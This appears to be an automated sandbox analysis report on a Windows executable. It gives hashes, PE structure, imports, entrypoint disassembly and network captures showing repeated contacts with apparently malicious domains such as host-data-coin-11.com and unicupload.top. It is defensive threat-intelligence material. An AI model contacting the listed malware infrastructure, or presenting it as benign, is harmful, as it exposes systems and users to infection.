                                                                                                                        Reputation:unknown
                                                                                                                        Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Entropy (8bit):6.696489645572037
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                        • Windows Screen Saver (13104/52) 0.13%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:GNXG5XLBEH.exe
                                                                                                                        File size:321536
                                                                                                                        MD5:6f48e0e76c5dfb3fc3aa45311fa6d0ef
                                                                                                                        SHA1:981a29377351493ce6bce4d3aedeec9034dee056
                                                                                                                        SHA256:277ac2c203e37dcf3b71748e7de0610ba4bf87ddbb7a19cbe7e6be4cce5ed175
                                                                                                                        SHA512:394f5c1e1e83eea7a838270edd90ae644b4a4f8f0009ac9f382400ea10960f04a4df4ec8e10cd75aba7fd9f3424c951bdc6015742899ec77ac666c05f09692d4
                                                                                                                        SSDEEP:6144:AJfyOCHHmx9MGofauzMYFm6ggAc3DJbkLGrl6:A9onmx4ffPw6kc3FkLm
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,...~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...wi._...........................

                                                                                                                        File Icon

                                                                                                                        Icon Hash:c8d0d8e0f8e0f4e8

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x41b840
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x5F906977 [Wed Oct 21 17:01:43 2020 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:5
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:5
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:5
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:6801e04a0c2ca60ac2497c0d8723846b

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        mov edi, edi
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        call 00007FDCCC6B142Bh
                                                                                                                        call 00007FDCCC6A43A6h
                                                                                                                        pop ebp
                                                                                                                        ret
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        mov edi, edi
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        push FFFFFFFEh
                                                                                                                        push 0043DE38h
                                                                                                                        push 0041EA20h
                                                                                                                        mov eax, dword ptr fs:[00000000h]
                                                                                                                        push eax
                                                                                                                        add esp, FFFFFF94h
                                                                                                                        push ebx
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        mov eax, dword ptr [00440354h]
                                                                                                                        xor dword ptr [ebp-08h], eax
                                                                                                                        xor eax, ebp
                                                                                                                        push eax
                                                                                                                        lea eax, dword ptr [ebp-10h]
                                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                                        mov dword ptr [ebp-18h], esp
                                                                                                                        mov dword ptr [ebp-70h], 00000000h
                                                                                                                        mov dword ptr [ebp-04h], 00000000h
                                                                                                                        lea eax, dword ptr [ebp-60h]
                                                                                                                        push eax
                                                                                                                        call dword ptr [0040109Ch]
                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                        jmp 00007FDCCC6A43B8h
                                                                                                                        mov eax, 00000001h
                                                                                                                        ret
                                                                                                                        mov esp, dword ptr [ebp-18h]
                                                                                                                        mov dword ptr [ebp-78h], 000000FFh
                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                        mov eax, dword ptr [ebp-78h]
                                                                                                                        jmp 00007FDCCC6A44E7h
                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                        call 00007FDCCC6A4524h
                                                                                                                        mov dword ptr [ebp-6Ch], eax
                                                                                                                        push 00000001h
                                                                                                                        call 00007FDCCC6B1E0Ah
                                                                                                                        add esp, 04h
                                                                                                                        test eax, eax
                                                                                                                        jne 00007FDCCC6A439Ch
                                                                                                                        push 0000001Ch
                                                                                                                        call 00007FDCCC6A44DCh
                                                                                                                        add esp, 04h
                                                                                                                        call 00007FDCCC6AD484h
                                                                                                                        test eax, eax
                                                                                                                        jne 00007FDCCC6A439Ch
                                                                                                                        push 00000010h

                                                                                                                        Rich Headers

                                                                                                                        Programming Language:
                                                                                                                        • [ C ] VS2008 build 21022
                                                                                                                        • [IMP] VS2005 build 50727
                                                                                                                        • [ASM] VS2008 build 21022
                                                                                                                        • [LNK] VS2008 build 21022
                                                                                                                        • [RES] VS2008 build 21022
                                                                                                                        • [C++] VS2008 build 21022

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3e5640x50.text
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1500000x8730.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1590000x1e00.reloc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x13a00x1c.text
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x91000x40.text
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000x34c.text
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x3e91e0x3ea00False0.583777756986data6.97280495233IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                        .data0x400000x10c9880x1800False0.340983072917data3.46813100102IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .vaxego0x14d0000x50x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .gig0x14e0000xea0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .hojotew0x14f0000xd930xe00False0.00697544642857data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .rsrc0x1500000x87300x8800False0.594985064338data5.82818673804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .reloc0x1590000x465a0x4800False0.344021267361data3.68094584687IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                        AFX_DIALOG_LAYOUT0x1570480x2dataDutchNetherlands
                                                                                                                        AFX_DIALOG_LAYOUT0x1570400x2dataDutchNetherlands
                                                                                                                        AFX_DIALOG_LAYOUT0x1570500x2dataDutchNetherlands
                                                                                                                        AFX_DIALOG_LAYOUT0x1570580x2dataDutchNetherlands
                                                                                                                        CIDAFICUDUROSOTAROM0x1566280x6c7ASCII text, with very long lines, with no line terminatorsAssameseIndia
                                                                                                                        VIDIWAYAPENIGU0x156cf00x2faASCII text, with very long lines, with no line terminatorsAssameseIndia
                                                                                                                        RT_CURSOR0x1570600x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"DutchNetherlands
                                                                                                                        RT_ICON0x1507400x6c8dataAssameseIndia
                                                                                                                        RT_ICON0x150e080x568GLS_BINARY_LSB_FIRSTAssameseIndia
                                                                                                                        RT_ICON0x1513700x10a8dataAssameseIndia
                                                                                                                        RT_ICON0x1524180x988dBase III DBT, version number 0, next free block index 40AssameseIndia
                                                                                                                        RT_ICON0x152da00x468GLS_BINARY_LSB_FIRSTAssameseIndia
                                                                                                                        RT_ICON0x1532580x8a8dataAssameseIndia
                                                                                                                        RT_ICON0x153b000x6c8dataAssameseIndia
                                                                                                                        RT_ICON0x1541c80x568GLS_BINARY_LSB_FIRSTAssameseIndia
                                                                                                                        RT_ICON0x1547300x10a8dataAssameseIndia
                                                                                                                        RT_ICON0x1557d80x988dataAssameseIndia
                                                                                                                        RT_ICON0x1561600x468GLS_BINARY_LSB_FIRSTAssameseIndia
                                                                                                                        RT_STRING0x1579200xe4dataDutchNetherlands
                                                                                                                        RT_STRING0x157a080x3bcdataDutchNetherlands
                                                                                                                        RT_STRING0x157dc80x6e6dataDutchNetherlands
                                                                                                                        RT_STRING0x1584b00x1a0dataDutchNetherlands
                                                                                                                        RT_STRING0x1586500xdcdataDutchNetherlands
                                                                                                                        RT_ACCELERATOR0x1570000x10dataDutchNetherlands
                                                                                                                        RT_ACCELERATOR0x156ff00x10dataDutchNetherlands
                                                                                                                        RT_GROUP_CURSOR0x1579080x14dataDutchNetherlands
                                                                                                                        RT_GROUP_ICON0x1532080x4cdataAssameseIndia
                                                                                                                        RT_GROUP_ICON0x1565c80x5adataAssameseIndia
                                                                                                                        None0x1570200xadataDutchNetherlands
                                                                                                                        None0x1570300xadataDutchNetherlands
                                                                                                                        None0x1570100xadataDutchNetherlands

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        KERNEL32.dllDeactivateActCtx, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthA, GetDefaultCommConfigA, FindFirstFileExW, GetDriveTypeA, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameW, CopyFileA, TlsGetValue, GetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, CallNamedPipeA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, SetPriorityClass, WritePrivateProfileStringW, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetLastError, GetProfileStringW, WriteProfileSectionW, GetProfileStringA, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, ReadFileScatter, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceA, WriteConsoleA, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, GetExitCodeProcess, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBW, PeekConsoleInputW, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetOverlappedResult, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, SetFileShortNameA, lstrcpyA, VerLanguageNameW, SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetModuleHandleW, WriteConsoleOutputCharacterA, GetConsoleMode, HeapFree, OpenMutexA, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetConsoleAliasesLengthW, GetCurrentProcessId, lstrcpynA, SetNamedPipeHandleState, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, AssignProcessToJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, FindActCtxSectionGuid, TerminateProcess, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, GetConsoleOutputCP, CloseHandle, CreateFileA
                                                                                                                        USER32.dllOemToCharA
                                                                                                                        ADVAPI32.dllGetFileSecurityA

                                                                                                                        Possible Origin

                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        DutchNetherlands
                                                                                                                        AssameseIndia

                                                                                                                        Network Behavior

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jan 14, 2022 19:09:10.387345076 CET4977080192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:10.404674053 CET80497708.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:10.404799938 CET4977080192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:10.404911041 CET4977080192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:10.405127048 CET4977080192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:10.422224998 CET80497708.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:10.422251940 CET80497708.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:10.523483992 CET80497708.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:10.523562908 CET4977080192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:10.529958010 CET4977080192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:10.547238111 CET80497708.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:10.826162100 CET4977180192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:10.843508005 CET80497718.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:10.843722105 CET4977180192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:10.843818903 CET4977180192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:10.843837023 CET4977180192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:10.861027002 CET80497718.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:10.992263079 CET80497718.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:10.992389917 CET4977180192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:10.992419004 CET4977180192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.009704113 CET80497718.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:11.315288067 CET4977280192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.333941936 CET80497728.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:11.334037066 CET4977280192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.334218025 CET4977280192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.334244013 CET4977280192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.351484060 CET80497728.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:11.473615885 CET80497728.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:11.473642111 CET80497728.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:11.473728895 CET4977280192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.473957062 CET4977280192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.491169930 CET80497728.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:11.503705025 CET4977380192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.521045923 CET80497738.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:11.521152020 CET4977380192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.521301031 CET4977380192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.521315098 CET4977380192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.538548946 CET80497738.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:11.640045881 CET80497738.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:11.640197039 CET4977380192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.640793085 CET4977380192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.657999039 CET80497738.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:11.689133883 CET4977480192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.706573009 CET80497748.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:11.707658052 CET4977480192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.707782984 CET4977480192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.708970070 CET4977480192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.726913929 CET80497748.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:11.726924896 CET80497748.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:11.831325054 CET80497748.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:11.831748009 CET4977480192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.831789017 CET4977480192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:11.849798918 CET80497748.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:12.128669024 CET4977580192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:12.146019936 CET80497758.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:12.146136045 CET4977580192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:12.146214008 CET4977580192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:12.146270037 CET4977580192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:12.163486958 CET80497758.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:12.267251015 CET80497758.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:12.268153906 CET4977580192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:12.289881945 CET4977580192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:12.298269987 CET4977680192.168.2.5185.186.142.166
                                                                                                                        Jan 14, 2022 19:09:12.307308912 CET80497758.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:12.354926109 CET8049776185.186.142.166192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:12.858334064 CET4977680192.168.2.5185.186.142.166
                                                                                                                        Jan 14, 2022 19:09:12.914896965 CET8049776185.186.142.166192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:13.420866013 CET4977680192.168.2.5185.186.142.166
                                                                                                                        Jan 14, 2022 19:09:13.477473021 CET8049776185.186.142.166192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:13.507689953 CET4977980192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:13.525131941 CET80497798.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:13.527640104 CET4977980192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:13.528044939 CET4977980192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:13.528064966 CET4977980192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:13.545316935 CET80497798.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:13.645750046 CET80497798.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:13.645831108 CET4977980192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:13.646100044 CET4977980192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:13.663558006 CET80497798.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:13.967298985 CET4978080192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:13.984962940 CET80497808.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:13.985094070 CET4978080192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:13.985220909 CET4978080192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:13.985270977 CET4978080192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:14.002701998 CET80497808.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:14.002734900 CET80497808.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:14.107836962 CET80497808.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:14.109127045 CET4978080192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:14.109364033 CET4978080192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:14.127881050 CET80497808.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:14.136804104 CET4978180192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:14.154135942 CET80497818.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:14.154216051 CET4978180192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:14.154347897 CET4978180192.168.2.58.209.70.0
                                                                                                                        Jan 14, 2022 19:09:14.213144064 CET80497818.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:14.256747007 CET80497818.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:14.256778002 CET80497818.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:14.256797075 CET80497818.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:14.256817102 CET80497818.209.70.0192.168.2.5
                                                                                                                        Jan 14, 2022 19:09:14.256839037 CET80497818.209.70.0192.168.2.5

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                        Jan 14, 2022 19:09:10.061032057 CET192.168.2.58.8.8.80xddd3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:10.540186882 CET192.168.2.58.8.8.80x8cb0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:11.001127005 CET192.168.2.58.8.8.80xb88aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:11.482151031 CET192.168.2.58.8.8.80x9f8aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:11.671001911 CET192.168.2.58.8.8.80xac73Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:11.842314005 CET192.168.2.58.8.8.80x8f08Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:13.487374067 CET192.168.2.58.8.8.80x9857Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:13.655011892 CET192.168.2.58.8.8.80xc3e6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:14.117935896 CET192.168.2.58.8.8.80x5f4fStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:15.862174034 CET192.168.2.58.8.8.80xb8b3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:16.343225002 CET192.168.2.58.8.8.80x82e5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:16.538634062 CET192.168.2.58.8.8.80xdc51Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:17.318478107 CET192.168.2.58.8.8.80x4068Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:17.542150974 CET192.168.2.58.8.8.80xfeedStandard query (0)privacy-tools-for-you-780.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:21.053544998 CET192.168.2.58.8.8.80x7aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:21.225140095 CET192.168.2.58.8.8.80x6c1cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:21.414207935 CET192.168.2.58.8.8.80xa496Standard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:21.574366093 CET192.168.2.58.8.8.80xa674Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:21.755300045 CET192.168.2.58.8.8.80x2ae1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:21.930671930 CET192.168.2.58.8.8.80x45adStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:22.103765011 CET192.168.2.58.8.8.80x58feStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:22.276225090 CET192.168.2.58.8.8.80xc071Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:24.539366007 CET192.168.2.58.8.8.80x9c96Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:24.708920956 CET192.168.2.58.8.8.80x80f1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:24.883527040 CET192.168.2.58.8.8.80xa1aaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
